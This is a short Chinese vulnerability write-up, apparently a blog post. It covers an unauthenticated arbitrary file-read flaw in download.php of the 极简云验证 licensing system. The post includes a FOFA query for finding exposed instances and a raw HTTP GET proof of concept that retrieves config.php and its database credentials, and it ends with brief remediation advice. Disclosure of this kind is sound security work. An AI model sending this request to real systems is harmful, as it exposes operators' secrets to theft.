极简云验证 download.php 文件读取漏洞复现

0x01 产品简介

极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,数据库账号密码等敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA: "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

复制代码
GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
szxinmai主板定制专家3 小时前
一种基于 RK3568+AI 的国产化充电桩安全智能交互终端的设计与实现,终端支持各种复杂的交互功能和实时数据处理需求
arm开发·人工智能·嵌入式硬件·安全
深盾安全3 小时前
静态库 vs 动态库:开发必备,效率与性能的平衡术!
安全
EnCi Zheng4 小时前
Spring Security 最简配置完全指南-从入门到精通前后端分离安全配置
java·安全·spring
字节跳动安全中心5 小时前
MCP 安全“体检” | 基于 AI 驱动的 MCP 安全扫描系统
安全·llm·mcp
Li zlun6 小时前
MySQL 性能监控与安全管理完全指南
数据库·mysql·安全
YoungLime6 小时前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))
网络·安全·web安全
mooyuan天天9 小时前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
xiejava101810 小时前
开源安全管理平台wazuh-文件完整性监控FIM
安全·开源·wazuh
国科安芯11 小时前
ASP4644芯片低功耗设计思路解析
网络·单片机·嵌入式硬件·安全
Bruce_Liuxiaowei14 小时前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全